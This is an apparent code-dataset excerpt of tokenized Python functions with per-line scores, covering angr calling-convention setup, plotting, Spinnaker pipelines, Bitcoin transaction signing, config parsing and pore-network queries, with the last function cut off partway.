")",
"return",
"allocator",
"=",
"AllocHelper",
"(",
"self",
".",
"arch",
".",
"bits",
",",
"self",
".",
"arch",
".",
"memory_endness",
"==",
"'Iend_LE'",
")",
"#",
"# STEP 1: convert all values into serialized form",
"# this entails creating the vals list of simple values to store and also populating the allocator's",
"# understanding of what aux data needs to be stored",
"# This is also where we compute arg locations (arg_locs)",
"#",
"if",
"self",
".",
"func_ty",
"is",
"not",
"None",
":",
"vals",
"=",
"[",
"self",
".",
"_standardize_value",
"(",
"arg",
",",
"ty",
",",
"state",
",",
"allocator",
".",
"dump",
")",
"for",
"arg",
",",
"ty",
"in",
"zip",
"(",
"args",
",",
"self",
".",
"func_ty",
".",
"args",
")",
"]",
"else",
":",
"vals",
"=",
"[",
"self",
".",
"_standardize_value",
"(",
"arg",
",",
"None",
",",
"state",
",",
"allocator",
".",
"dump",
")",
"for",
"arg",
"in",
"args",
"]",
"arg_session",
"=",
"self",
".",
"arg_session",
"arg_locs",
"=",
"[",
"None",
"]",
"*",
"len",
"(",
"args",
")",
"for",
"i",
",",
"(",
"arg",
",",
"val",
")",
"in",
"enumerate",
"(",
"zip",
"(",
"args",
",",
"vals",
")",
")",
":",
"if",
"self",
".",
"is_fp_value",
"(",
"arg",
")",
"or",
"(",
"self",
".",
"func_ty",
"is",
"not",
"None",
"and",
"isinstance",
"(",
"self",
".",
"func_ty",
".",
"args",
"[",
"i",
"]",
",",
"SimTypeFloat",
")",
")",
":",
"arg_locs",
"[",
"i",
"]",
"=",
"arg_session",
".",
"next_arg",
"(",
"is_fp",
"=",
"True",
",",
"size",
"=",
"val",
".",
"length",
"//",
"state",
".",
"arch",
".",
"byte_width",
")",
"continue",
"if",
"val",
".",
"length",
">",
"state",
".",
"arch",
".",
"bits",
"or",
"(",
"self",
".",
"func_ty",
"is",
"None",
"and",
"isinstance",
"(",
"arg",
",",
"(",
"bytes",
",",
"str",
",",
"list",
",",
"tuple",
")",
")",
")",
":",
"vals",
"[",
"i",
"]",
"=",
"allocator",
".",
"dump",
"(",
"val",
",",
"state",
")",
"elif",
"val",
".",
"length",
"<",
"state",
".",
"arch",
".",
"bits",
":",
"if",
"self",
".",
"arch",
".",
"memory_endness",
"==",
"'Iend_LE'",
":",
"vals",
"[",
"i",
"]",
"=",
"val",
".",
"concat",
"(",
"claripy",
".",
"BVV",
"(",
"0",
",",
"state",
".",
"arch",
".",
"bits",
"-",
"val",
".",
"length",
")",
")",
"else",
":",
"vals",
"[",
"i",
"]",
"=",
"claripy",
".",
"BVV",
"(",
"0",
",",
"state",
".",
"arch",
".",
"bits",
"-",
"val",
".",
"length",
")",
".",
"concat",
"(",
"val",
")",
"arg_locs",
"[",
"i",
"]",
"=",
"arg_session",
".",
"next_arg",
"(",
"is_fp",
"=",
"False",
",",
"size",
"=",
"vals",
"[",
"i",
"]",
".",
"length",
"//",
"state",
".",
"arch",
".",
"byte_width",
")",
"#",
"# STEP 2: decide on memory storage locations",
"# implement the contract for stack_base/alloc_base/grow_like_stack",
"# after this, stack_base should be the final stack pointer, alloc_base should be the final aux storage location,",
"# and the stack pointer should be updated",
"#",
"if",
"stack_base",
"is",
"None",
":",
"if",
"alloc_base",
"is",
"None",
":",
"alloc_size",
"=",
"allocator",
".",
"size",
"(",
")",
"state",
".",
"regs",
".",
"sp",
"-=",
"alloc_size",
"alloc_base",
"=",
"state",
".",
"regs",
".",
"sp",
"grow_like_stack",
"=",
"False",
"state",
".",
"regs",
".",
"sp",
"-=",
"self",
".",
"stack_space",
"(",
"arg_locs",
")",
"# handle alignment",
"alignment",
"=",
"(",
"state",
".",
"regs",
".",
"sp",
"+",
"self",
".",
"STACKARG_SP_DIFF",
")",
"%",
"self",
".",
"STACK_ALIGNMENT",
"state",
".",
"regs",
".",
"sp",
"-=",
"alignment",
"else",
":",
"state",
".",
"regs",
".",
"sp",
"=",
"stack_base",
"if",
"alloc_base",
"is",
"None",
":",
"alloc_base",
"=",
"stack_base",
"+",
"self",
".",
"stack_space",
"(",
"arg_locs",
")",
"grow_like_stack",
"=",
"False",
"if",
"grow_like_stack",
":",
"alloc_base",
"-=",
"allocator",
".",
"size",
"(",
")",
"if",
"type",
"(",
"alloc_base",
")",
"is",
"int",
":",
"alloc_base",
"=",
"claripy",
".",
"BVV",
"(",
"alloc_base",
",",
"state",
".",
"arch",
".",
"bits",
")",
"for",
"i",
",",
"val",
"in",
"enumerate",
"(",
"vals",
")",
":",
"vals",
"[",
"i",
"]",
"=",
"allocator",
".",
"translate",
"(",
"val",
",",
"alloc_base",
")",
"#",
"# STEP 3: store everything!",
"#",
"allocator",
".",
"apply",
"(",
"state",
",",
"alloc_base",
")",
"for",
"loc",
",",
"val",
"in",
"zip",
"(",
"arg_locs",
",",
"vals",
")",
":",
"if",
"val",
".",
"length",
">",
"loc",
".",
"size",
"*",
"8",
":",
"raise",
"ValueError",
"(",
"\"Can't fit value {} into location {}\"",
".",
"format",
"(",
"repr",
"(",
"val",
")",
",",
"repr",
"(",
"loc",
")",
")",
")",
"loc",
".",
"set_value",
"(",
"state",
",",
"val",
",",
"endness",
"=",
"'Iend_BE'",
",",
"stack_base",
"=",
"stack_base",
")",
"self",
".",
"return_addr",
".",
"set_value",
"(",
"state",
",",
"ret_addr",
",",
"stack_base",
"=",
"stack_base",
")"
] | 49.444444 | [
0.019230769230769232,
0.18181818181818182,
0.031578947368421054,
0,
0.05172413793103448,
0.044444444444444446,
0.043478260869565216,
0.03508771929824561,
0.04040404040404041,
0.036036036036036036,
0,
0.034782608695652174,
0.03389830508474576,
0.039603960396039604,
0.03669724770642202,
0.03614457831325301,
0,
0.029411764705882353,
0.02702702702702703,
0,
0.025210084033613446,
0.02586206896551724,
0.02631578947368421,
0.0392156862745098,
0.18181818181818182,
0,
0.06451612903225806,
0,
0.05128205128205128,
0.031746031746031744,
0.1111111111111111,
0,
0.03488372093023256,
0,
0.2222222222222222,
0.03508771929824561,
0.028037383177570093,
0.03389830508474576,
0.03125,
0.2222222222222222,
0,
0.05555555555555555,
0.025,
0.15384615384615385,
0.031914893617021274,
0,
0.05263157894736842,
0.05714285714285714,
0.03571428571428571,
0.04878048780487805,
0.030612244897959183,
0.028846153846153848,
0.08333333333333333,
0.02564102564102564,
0.038461538461538464,
0.043478260869565216,
0.03508771929824561,
0.03488372093023256,
0.09523809523809523,
0.03488372093023256,
0.02857142857142857,
0,
0.2222222222222222,
0.038461538461538464,
0.02702702702702703,
0.025,
0.04081632653061224,
0.2222222222222222,
0,
0.06666666666666667,
0.058823529411764705,
0.044444444444444446,
0.046511627906976744,
0.047619047619047616,
0.05128205128205128,
0,
0.03636363636363636,
0,
0.06666666666666667,
0.03488372093023256,
0.05263157894736842,
0,
0.15384615384615385,
0.05263157894736842,
0,
0.058823529411764705,
0.029411764705882353,
0.05128205128205128,
0,
0.07407407407407407,
0.047619047619047616,
0.05714285714285714,
0.03076923076923077,
0,
0.05263157894736842,
0.034482758620689655,
0,
0.2222222222222222,
0.05714285714285714,
0.2222222222222222,
0,
0.047619047619047616,
0,
0.045454545454545456,
0.04878048780487805,
0.03,
0.02531645569620253,
0.02702702702702703
] |
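A hedged usage sketch (this reads as angr's SimCC API; the binary path and return address below are placeholders, and the exact factory entry points may vary between angr versions):

import angr

proj = angr.Project("/bin/true", auto_load_libs=False)
state = proj.factory.blank_state()
cc = proj.factory.cc()   # default calling convention for the project's arch

# Lay out registers/stack as if calling f(42, "hi") with return to 0x400000.
# The bytes argument is wrapped in a pointer automatically, per the docstring.
cc.setup_callsite(state, 0x400000, [42, b"hi\x00"])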
def add_net_values_to_bar_plot(axs, color='k'):
    """Add net values next to an existing vertical stacked bar chart

    Parameters
    ----------
    axs : matplotlib.Axes or list thereof
    color : str, optional, default: black
        the color of the bars to add
    """
    axs = axs if isinstance(axs, Iterable) else [axs]
    for ax in axs:
        box_args = _get_boxes(ax)
        for x, args in box_args.items():
            rect = mpatches.Rectangle(*args, color=color)
            ax.add_patch(rect) | [
"def",
"add_net_values_to_bar_plot",
"(",
"axs",
",",
"color",
"=",
"'k'",
")",
":",
"axs",
"=",
"axs",
"if",
"isinstance",
"(",
"axs",
",",
"Iterable",
")",
"else",
"[",
"axs",
"]",
"for",
"ax",
"in",
"axs",
":",
"box_args",
"=",
"_get_boxes",
"(",
"ax",
")",
"for",
"x",
",",
"args",
"in",
"box_args",
".",
"items",
"(",
")",
":",
"rect",
"=",
"mpatches",
".",
"Rectangle",
"(",
"*",
"args",
",",
"color",
"=",
"color",
")",
"ax",
".",
"add_patch",
"(",
"rect",
")"
] | 33.266667 | [
0.02127659574468085,
0.029411764705882353,
0,
0.14285714285714285,
0.14285714285714285,
0.07317073170731707,
0.07317073170731707,
0.05555555555555555,
0.2857142857142857,
0.03773584905660377,
0.1111111111111111,
0.06060606060606061,
0.05,
0.03508771929824561,
0.06666666666666667
] |
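Assuming the surrounding module is available (the helper relies on the private _get_boxes to inspect the existing bar patches), a usage sketch on a stacked bar chart with positive and negative components:

import matplotlib.pyplot as plt
import numpy as np

fig, ax = plt.subplots()
x = np.arange(3)
ax.bar(x, [2.0, 3.0, 1.5])        # positive component
ax.bar(x, [-0.5, -1.0, -0.5])     # negative component, stacked below zero

add_net_values_to_bar_plot(ax)    # helper above: draws the net-value bars
plt.show()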
def create_pipeline(self, onetime=None):
    """Create the spinnaker pipeline(s)."""
    utils.banner("Creating Pipeline")

    kwargs = {
        'app': self.app,
        'trigger_job': self.trigger_job,
        'prop_path': self.json_path,
        'base': None,
        'runway_dir': self.runway_dir,
    }

    pipeline_type = self.configs['pipeline']['type']

    if pipeline_type not in consts.ALLOWED_TYPES:
        raise NotImplementedError('Pipeline type "{0}" not permitted.'.format(pipeline_type))

    if not onetime:
        if pipeline_type == 'lambda':
            spinnakerpipeline = pipeline.SpinnakerPipelineLambda(**kwargs)
        elif pipeline_type == 's3':
            spinnakerpipeline = pipeline.SpinnakerPipelineS3(**kwargs)
        elif pipeline_type == 'datapipeline':
            spinnakerpipeline = pipeline.SpinnakerPipelineDataPipeline(**kwargs)
        elif pipeline_type == 'manual':
            spinnakerpipeline = pipeline.SpinnakerPipelineManual(**kwargs)
        else:
            # Handles all other pipelines
            spinnakerpipeline = pipeline.SpinnakerPipeline(**kwargs)
    else:
        spinnakerpipeline = pipeline.SpinnakerPipelineOnetime(onetime=onetime, **kwargs)

    spinnakerpipeline.create_pipeline() | [
"def",
"create_pipeline",
"(",
"self",
",",
"onetime",
"=",
"None",
")",
":",
"utils",
".",
"banner",
"(",
"\"Creating Pipeline\"",
")",
"kwargs",
"=",
"{",
"'app'",
":",
"self",
".",
"app",
",",
"'trigger_job'",
":",
"self",
".",
"trigger_job",
",",
"'prop_path'",
":",
"self",
".",
"json_path",
",",
"'base'",
":",
"None",
",",
"'runway_dir'",
":",
"self",
".",
"runway_dir",
",",
"}",
"pipeline_type",
"=",
"self",
".",
"configs",
"[",
"'pipeline'",
"]",
"[",
"'type'",
"]",
"if",
"pipeline_type",
"not",
"in",
"consts",
".",
"ALLOWED_TYPES",
":",
"raise",
"NotImplementedError",
"(",
"'Pipeline type \"{0}\" not permitted.'",
".",
"format",
"(",
"pipeline_type",
")",
")",
"if",
"not",
"onetime",
":",
"if",
"pipeline_type",
"==",
"'lambda'",
":",
"spinnakerpipeline",
"=",
"pipeline",
".",
"SpinnakerPipelineLambda",
"(",
"*",
"*",
"kwargs",
")",
"elif",
"pipeline_type",
"==",
"'s3'",
":",
"spinnakerpipeline",
"=",
"pipeline",
".",
"SpinnakerPipelineS3",
"(",
"*",
"*",
"kwargs",
")",
"elif",
"pipeline_type",
"==",
"'datapipeline'",
":",
"spinnakerpipeline",
"=",
"pipeline",
".",
"SpinnakerPipelineDataPipeline",
"(",
"*",
"*",
"kwargs",
")",
"elif",
"pipeline_type",
"==",
"'manual'",
":",
"spinnakerpipeline",
"=",
"pipeline",
".",
"SpinnakerPipelineManual",
"(",
"*",
"*",
"kwargs",
")",
"else",
":",
"# Handles all other pipelines",
"spinnakerpipeline",
"=",
"pipeline",
".",
"SpinnakerPipeline",
"(",
"*",
"*",
"kwargs",
")",
"else",
":",
"spinnakerpipeline",
"=",
"pipeline",
".",
"SpinnakerPipelineOnetime",
"(",
"onetime",
"=",
"onetime",
",",
"*",
"*",
"kwargs",
")",
"spinnakerpipeline",
".",
"create_pipeline",
"(",
")"
] | 40.333333 | [
0.025,
0.0425531914893617,
0.04878048780487805,
0,
0.16666666666666666,
0.07142857142857142,
0.045454545454545456,
0.05,
0.08,
0.047619047619047616,
0.3333333333333333,
0,
0.03571428571428571,
0,
0.03773584905660377,
0.030927835051546393,
0,
0.08695652173913043,
0.04878048780487805,
0.02564102564102564,
0.05128205128205128,
0.02702702702702703,
0.04081632653061224,
0.03571428571428571,
0.046511627906976744,
0.02564102564102564,
0.11764705882352941,
0.044444444444444446,
0.027777777777777776,
0.15384615384615385,
0.03260869565217391,
0,
0.046511627906976744
] |
def sign(self, hash160_lookup, tx_in_idx_set=None, hash_type=None, **kwargs):
    """
    Sign a standard transaction.

    hash160_lookup:
        A dictionary (or another object with .get) where keys are hash160 and
        values are tuples (secret exponent, public_pair, is_compressed) or None
        (in which case the script will obviously not be signed).
    """
    checker = self.SolutionChecker(self.tx)
    if tx_in_idx_set is None:
        tx_in_idx_set = range(len(self.tx.txs_in))
    self.tx.check_unspents()
    for tx_in_idx in sorted(tx_in_idx_set):
        tx_context = checker.tx_context_for_idx(tx_in_idx)
        try:
            checker.check_solution(tx_context, flags=None)
            continue
        except ScriptError:
            pass
        try:
            r = self.solve(hash160_lookup, tx_in_idx, hash_type=hash_type, **kwargs)
            if isinstance(r, bytes):
                self.tx.txs_in[tx_in_idx].script = r
            else:
                self.tx.txs_in[tx_in_idx].script = r[0]
                self.tx.set_witness(tx_in_idx, r[1])
        except (SolvingError, ValueError):
            pass
    return self | [
"def",
"sign",
"(",
"self",
",",
"hash160_lookup",
",",
"tx_in_idx_set",
"=",
"None",
",",
"hash_type",
"=",
"None",
",",
"*",
"*",
"kwargs",
")",
":",
"checker",
"=",
"self",
".",
"SolutionChecker",
"(",
"self",
".",
"tx",
")",
"if",
"tx_in_idx_set",
"is",
"None",
":",
"tx_in_idx_set",
"=",
"range",
"(",
"len",
"(",
"self",
".",
"tx",
".",
"txs_in",
")",
")",
"self",
".",
"tx",
".",
"check_unspents",
"(",
")",
"for",
"tx_in_idx",
"in",
"sorted",
"(",
"tx_in_idx_set",
")",
":",
"tx_context",
"=",
"checker",
".",
"tx_context_for_idx",
"(",
"tx_in_idx",
")",
"try",
":",
"checker",
".",
"check_solution",
"(",
"tx_context",
",",
"flags",
"=",
"None",
")",
"continue",
"except",
"ScriptError",
":",
"pass",
"try",
":",
"r",
"=",
"self",
".",
"solve",
"(",
"hash160_lookup",
",",
"tx_in_idx",
",",
"hash_type",
"=",
"hash_type",
",",
"*",
"*",
"kwargs",
")",
"if",
"isinstance",
"(",
"r",
",",
"bytes",
")",
":",
"self",
".",
"tx",
".",
"txs_in",
"[",
"tx_in_idx",
"]",
".",
"script",
"=",
"r",
"else",
":",
"self",
".",
"tx",
".",
"txs_in",
"[",
"tx_in_idx",
"]",
".",
"script",
"=",
"r",
"[",
"0",
"]",
"self",
".",
"tx",
".",
"set_witness",
"(",
"tx_in_idx",
",",
"r",
"[",
"1",
"]",
")",
"except",
"(",
"SolvingError",
",",
"ValueError",
")",
":",
"pass",
"return",
"self"
] | 42.724138 | [
0.012987012987012988,
0.18181818181818182,
0.05555555555555555,
0.08695652173913043,
0.06172839506172839,
0.04819277108433735,
0.04411764705882353,
0.18181818181818182,
0.0425531914893617,
0.06060606060606061,
0.037037037037037035,
0.0625,
0.0425531914893617,
0.03225806451612903,
0.125,
0.03225806451612903,
0.08333333333333333,
0.06451612903225806,
0.1,
0.125,
0.03409090909090909,
0.05,
0.03571428571428571,
0.09523809523809523,
0.03389830508474576,
0.03571428571428571,
0.043478260869565216,
0.1,
0.10526315789473684
] |
def _analyze(self):
    """Convert a few elementary fields into a molecule object"""
    if ("Atomic numbers" in self.fields) and ("Current cartesian coordinates" in self.fields):
        self.molecule = Molecule(
            self.fields["Atomic numbers"],
            np.reshape(self.fields["Current cartesian coordinates"], (-1, 3)),
            self.title,
        ) | [
"def",
"_analyze",
"(",
"self",
")",
":",
"if",
"(",
"\"Atomic numbers\"",
"in",
"self",
".",
"fields",
")",
"and",
"(",
"\"Current cartesian coordinates\"",
"in",
"self",
".",
"fields",
")",
":",
"self",
".",
"molecule",
"=",
"Molecule",
"(",
"self",
".",
"fields",
"[",
"\"Atomic numbers\"",
"]",
",",
"np",
".",
"reshape",
"(",
"self",
".",
"fields",
"[",
"\"Current cartesian coordinates\"",
"]",
",",
"(",
"-",
"1",
",",
"3",
")",
")",
",",
"self",
".",
"title",
",",
")"
] | 48.75 | [
0.05263157894736842,
0.029411764705882353,
0.030612244897959183,
0.08108108108108109,
0.043478260869565216,
0.036585365853658534,
0.07407407407407407,
0.23076923076923078
] |
def _get_input_validator(self, request):
    """ Return appropriate input validator.

    For POST requests, ``self.post_representation`` is returned
    if it is present, ``self.representation`` otherwise.
    """
    method = request.method.upper()
    if method != 'POST':
        return self.representation
    elif self.post_representation:
        return self.post_representation
    else:
        return self.representation | [
"def",
"_get_input_validator",
"(",
"self",
",",
"request",
")",
":",
"method",
"=",
"request",
".",
"method",
".",
"upper",
"(",
")",
"if",
"method",
"!=",
"'POST'",
":",
"return",
"self",
".",
"representation",
"elif",
"self",
".",
"post_representation",
":",
"return",
"self",
".",
"post_representation",
"else",
":",
"return",
"self",
".",
"representation"
] | 33 | [
0.025,
0.0425531914893617,
0,
0.04477611940298507,
0.05,
0.18181818181818182,
0,
0.05128205128205128,
0.07142857142857142,
0.05263157894736842,
0.05263157894736842,
0.046511627906976744,
0.15384615384615385,
0.05263157894736842
] |
def use_options(allowed):
    """
    Decorator that logs warnings when unpermitted options are passed into its
    wrapped function.

    Requires that wrapped function has a keyword-only argument named
    `options`. If wrapped function has {options} in its docstring, fills in
    with the docs for allowed options.

    Args:
        allowed (list str): list of option keys allowed. If the wrapped
            function is called with an option not in allowed, log a warning.
            All values in allowed must also be present in `defaults`.

    Returns:
        Wrapped function with options validation.

    >>> @use_options(['title'])
    ... def test(*, options={}): return options['title']

    >>> test(options={'title': 'Hello'})
    'Hello'

    >>> # test(options={'not_allowed': 123}) # Also logs error message
    ''
    """
    def update_docstring(f):
        _update_option_docstring(f, allowed)

        @functools.wraps(f)
        def check_options(*args, **kwargs):
            options = kwargs.get('options', {})
            not_allowed = [
                option for option in options if option not in allowed
                # Don't validate private options
                and not option.startswith('_')
            ]
            if not_allowed:
                logging.warning(
                    'The following options are not supported by '
                    'this function and will likely result in '
                    'undefined behavior: {}.'.format(not_allowed)
                )
            return f(*args, **kwargs)

        return check_options
    return update_docstring | [
"def",
"use_options",
"(",
"allowed",
")",
":",
"def",
"update_docstring",
"(",
"f",
")",
":",
"_update_option_docstring",
"(",
"f",
",",
"allowed",
")",
"@",
"functools",
".",
"wraps",
"(",
"f",
")",
"def",
"check_options",
"(",
"*",
"args",
",",
"*",
"*",
"kwargs",
")",
":",
"options",
"=",
"kwargs",
".",
"get",
"(",
"'options'",
",",
"{",
"}",
")",
"not_allowed",
"=",
"[",
"option",
"for",
"option",
"in",
"options",
"if",
"option",
"not",
"in",
"allowed",
"# Don't validate private options",
"and",
"not",
"option",
".",
"startswith",
"(",
"'_'",
")",
"]",
"if",
"not_allowed",
":",
"logging",
".",
"warning",
"(",
"'The following options are not supported by '",
"'this function and will likely result in '",
"'undefined behavior: {}.'",
".",
"format",
"(",
"not_allowed",
")",
")",
"return",
"f",
"(",
"*",
"args",
",",
"*",
"*",
"kwargs",
")",
"return",
"check_options",
"return",
"update_docstring"
] | 31.42 | [
0.04,
0.2857142857142857,
0.025974025974025976,
0.09523809523809523,
0,
0.028985507246376812,
0.04,
0.05263157894736842,
0,
0.2222222222222222,
0.04225352112676056,
0.02631578947368421,
0.043478260869565216,
0,
0.16666666666666666,
0.04081632653061224,
0,
0.12903225806451613,
0.03571428571428571,
0,
0.075,
0.18181818181818182,
0,
0.05714285714285714,
0.3333333333333333,
0.2857142857142857,
0,
0.07142857142857142,
0.045454545454545456,
0,
0.07407407407407407,
0.046511627906976744,
0.0425531914893617,
0.1111111111111111,
0.028985507246376812,
0.041666666666666664,
0.043478260869565216,
0.23076923076923078,
0.07407407407407407,
0.09375,
0.03076923076923077,
0.03225806451612903,
0.03076923076923077,
0.17647058823529413,
0,
0.05405405405405406,
0,
0.07142857142857142,
0,
0.07407407407407407
] |
def items(self, section=_UNSET, raw=False, vars=None):
    """Return a list of (name, value) tuples for each option in a section.

    All % interpolations are expanded in the return values, based on the
    defaults passed into the constructor, unless the optional argument
    `raw' is true.  Additional substitutions may be provided using the
    `vars' argument, which must be a dictionary whose contents override
    any pre-existing defaults.

    The section DEFAULT is special.
    """
    if section is _UNSET:
        return super(RawConfigParser, self).items()
    d = self._defaults.copy()
    try:
        d.update(self._sections[section])
    except KeyError:
        if section != self.default_section:
            raise NoSectionError(section)
    # Update with the entry specific variables
    if vars:
        for key, value in vars.items():
            d[self.optionxform(key)] = value
    value_getter = lambda option: self._interpolation.before_get(self,
        section, option, d[option], d)
    if raw:
        value_getter = lambda option: d[option]
    return [(option, value_getter(option)) for option in d.keys()] | [
"def",
"items",
"(",
"self",
",",
"section",
"=",
"_UNSET",
",",
"raw",
"=",
"False",
",",
"vars",
"=",
"None",
")",
":",
"if",
"section",
"is",
"_UNSET",
":",
"return",
"super",
"(",
"RawConfigParser",
",",
"self",
")",
".",
"items",
"(",
")",
"d",
"=",
"self",
".",
"_defaults",
".",
"copy",
"(",
")",
"try",
":",
"d",
".",
"update",
"(",
"self",
".",
"_sections",
"[",
"section",
"]",
")",
"except",
"KeyError",
":",
"if",
"section",
"!=",
"self",
".",
"default_section",
":",
"raise",
"NoSectionError",
"(",
"section",
")",
"# Update with the entry specific variables",
"if",
"vars",
":",
"for",
"key",
",",
"value",
"in",
"vars",
".",
"items",
"(",
")",
":",
"d",
"[",
"self",
".",
"optionxform",
"(",
"key",
")",
"]",
"=",
"value",
"value_getter",
"=",
"lambda",
"option",
":",
"self",
".",
"_interpolation",
".",
"before_get",
"(",
"self",
",",
"section",
",",
"option",
",",
"d",
"[",
"option",
"]",
",",
"d",
")",
"if",
"raw",
":",
"value_getter",
"=",
"lambda",
"option",
":",
"d",
"[",
"option",
"]",
"return",
"[",
"(",
"option",
",",
"value_getter",
"(",
"option",
")",
")",
"for",
"option",
"in",
"d",
".",
"keys",
"(",
")",
"]"
] | 43.392857 | [
0.018518518518518517,
0.02564102564102564,
0,
0.02631578947368421,
0.02702702702702703,
0.04054054054054054,
0.039473684210526314,
0.058823529411764705,
0,
0.05128205128205128,
0.18181818181818182,
0.06896551724137931,
0.03636363636363636,
0.06060606060606061,
0.16666666666666666,
0.044444444444444446,
0.08333333333333333,
0.0425531914893617,
0.044444444444444446,
0.04,
0.125,
0.046511627906976744,
0.041666666666666664,
0.05405405405405406,
0.07142857142857142,
0.13333333333333333,
0.058823529411764705,
0.02857142857142857
] |
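This is the stdlib configparser behavior; a quick demonstration of the three lookup paths the method supports (interpolated, raw, and vars-overridden):

from configparser import ConfigParser

parser = ConfigParser(defaults={"home": "/srv"})
parser.read_string("[paths]\ndata = %(home)s/data\n")

print(parser.items("paths"))                          # interpolated values
print(parser.items("paths", raw=True))                # raw '%(home)s/data'
print(parser.items("paths", vars={"home": "/tmp"}))   # vars override defaults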
def find_neighbor_throats(self, pores, mode='union', flatten=True):
    r"""
    Returns a list of throats neighboring the given pore(s)

    Parameters
    ----------
    pores : array_like
        Indices of pores whose neighbors are sought
    flatten : boolean, optional
        If ``True`` (default) a 1D array of unique throat indices is
        returned. If ``False`` the returned array contains arrays of
        neighboring throat indices for each input pore, in the order
        they were sent.
    mode : string
        Specifies logic to filter the resulting list. Options are:

        **'or'** : (default) All neighbors of the input pores. This is
        also known as the 'union' in set theory or 'any' in boolean logic.
        Both keywords are accepted and treated as 'or'.

        **'xor'** : Only neighbors of one and only one input pore. This
        is useful for finding the throats that are not shared by any of the
        input pores.

        **'xnor'** : Neighbors that are shared by two or more input pores.
        This is equivalent to finding all neighbors with 'or', minus those
        found with 'xor', and is useful for finding neighbors that the
        inputs have in common.

        **'and'** : Only neighbors shared by all input pores. This is also
        known as 'intersection' in set theory and (sometimes) as 'all' in
        boolean logic. Both keywords are accepted and treated as 'and'.

    Returns
    -------
    If ``flatten`` is ``True``, returns a 1D array of throat indices
    filtered according to the specified mode. If ``flatten`` is ``False``,
    returns a list of lists, where each list contains the neighbors of the
    corresponding input pores.

    Notes
    -----
    The ``logic`` options are applied to neighboring bonds only, thus it
    is not possible to obtain bonds that are part of the global set but
    not neighbors. This is because (a) the list of global bonds might be
    very large, and (b) it is not possible to return a list of neighbors
    for each input site if global sites are considered.

    Examples
    --------
    >>> import openpnm as op
    >>> pn = op.network.Cubic(shape=[5, 5, 5])
    >>> Ts = pn.find_neighbor_throats(pores=[0, 1])
    >>> print(Ts)
    [ 0 1 100 101 200 201]
    >>> Ts = pn.find_neighbor_throats(pores=[0, 1], flatten=False)
    >>> print(Ts)
    [array([ 0, 100, 200]), array([ 0, 1, 101, 201])]
    """
    pores = self._parse_indices(pores)
    if sp.size(pores) == 0:
        return sp.array([], ndmin=1, dtype=int)
    if 'lil' not in self._im.keys():
        self.get_incidence_matrix(fmt='lil')
    neighbors = topotools.find_neighbor_bonds(sites=pores, logic=mode,
                                              im=self._im['lil'],
                                              flatten=flatten)
    return neighbors | [
"def",
"find_neighbor_throats",
"(",
"self",
",",
"pores",
",",
"mode",
"=",
"'union'",
",",
"flatten",
"=",
"True",
")",
":",
"pores",
"=",
"self",
".",
"_parse_indices",
"(",
"pores",
")",
"if",
"sp",
".",
"size",
"(",
"pores",
")",
"==",
"0",
":",
"return",
"sp",
".",
"array",
"(",
"[",
"]",
",",
"ndmin",
"=",
"1",
",",
"dtype",
"=",
"int",
")",
"if",
"'lil'",
"not",
"in",
"self",
".",
"_im",
".",
"keys",
"(",
")",
":",
"self",
".",
"get_incidence_matrix",
"(",
"fmt",
"=",
"'lil'",
")",
"neighbors",
"=",
"topotools",
".",
"find_neighbor_bonds",
"(",
"sites",
"=",
"pores",
",",
"logic",
"=",
"mode",
",",
"im",
"=",
"self",
".",
"_im",
"[",
"'lil'",
"]",
",",
"flatten",
"=",
"flatten",
")",
"return",
"neighbors"
] | 42.633803 | [
0.014925373134328358,
0.16666666666666666,
0.031746031746031744,
0,
0.1111111111111111,
0.1111111111111111,
0.11538461538461539,
0.03636363636363636,
0,
0.08571428571428572,
0.041666666666666664,
0.041666666666666664,
0.027777777777777776,
0.07407407407407407,
0,
0.14285714285714285,
0.028169014084507043,
0,
0.05333333333333334,
0.02564102564102564,
0.03389830508474576,
0,
0.05263157894736842,
0.02531645569620253,
0.08333333333333333,
0,
0.05128205128205128,
0.02564102564102564,
0.02702702702702703,
0.058823529411764705,
0,
0.05063291139240506,
0.02631578947368421,
0.02631578947368421,
0,
0.13333333333333333,
0.13333333333333333,
0.041666666666666664,
0.0379746835443038,
0.02564102564102564,
0.058823529411764705,
0,
0.15384615384615385,
0.15384615384615385,
0.039473684210526314,
0.02666666666666667,
0.039473684210526314,
0.02631578947368421,
0.03389830508474576,
0,
0.125,
0.125,
0.09375,
0.06,
0.05454545454545454,
0.14285714285714285,
0.09090909090909091,
0.04285714285714286,
0.14285714285714285,
0.06557377049180328,
0,
0.18181818181818182,
0.047619047619047616,
0.06451612903225806,
0.0392156862745098,
0.05,
0.041666666666666664,
0.04054054054054054,
0.057971014492753624,
0.07575757575757576,
0.08333333333333333
] |
def substitute(s, objlist=(), globals={}, locals={}):
    """Substitute global python variables in a command string.

    This function parses a string and tries to substitute parts like
    `$name` by their value. It is used by :mod:`image` and :mod:`table`
    to handle image and table objects in a command, but also other
    variables (integers, strings, etc.) can be substituted.

    The following rules apply:

    1. A name must start with an underscore or alphabetic, followed
       by zero or more alphanumerics and underscores.
    2. String parts enclosed in single or double quotes are literals and
       are left untouched.
       Furthermore a $ can be escaped by a backslash, which is useful
       if an environment variable is used. Note that an extra backslash
       is required in Python to escape the backslash.
       The output contains the quotes and backslashes.
    3. A variable is looked up in the given local and global namespaces.
    4. If the variable `name` has a vector value, its substitution is
       enclosed in square brackets and separated by commas.
    5. A string value is enclosed in double quotes. If the value
       contains a double quote, that quote is enclosed in single quotes.
    6. If the name's value has a type mentioned in the argument `objlist`,
       it is substituted by `$n` (where n is a sequence number) and its
       value is added to the objects of that type in `objlist`.
    7. If the name is unknown or has an unknown type, it is left untouched.

    The `objlist` argument is a list of tuples or lists where each tuple
    or list has three fields:

    1. The first field is the object type (e.g. `table`)
    2. The second field is a prefix for the sequence number (usually empty).
       E.g. regions could have prefix 'r' resulting in a substitution like
       `$r1`.
    3. The third field is a list of objects to be substituted. New objects
       get appended to it. Usually the list is initially empty.

    Apart from substituting variables, it also substitutes `$(expression)`
    by the expression result.
    It correctly handles parentheses and quotes in the expression.
    For example::

      >>> a = 2
      >>> b = 3
      >>> substitute('$(a+b)+$a')
      '5+2'
      >>> substitute('$(a+b+a)')
      '7'
      >>> substitute('$((a+b)+$a)')
      '$((a+b)+$a)'
      >>> substitute('$((a+b)*(a+b))')
      '25'
      >>> substitute('$(len("ab cd( de"))')
      '9'

    Substitution is NOT recursive. E.g. if a=1 and b="$a",
    the result of substitute("$b") is "$a" and not 1.
    """
    # Get the local variables at the caller level if not given.
    if not locals:
        locals = getlocals(3)
    # Initialize some variables.
    backslash = False
    dollar = False
    nparen = 0
    name = ''
    evalstr = ''
    squote = False
    dquote = False
    out = ''
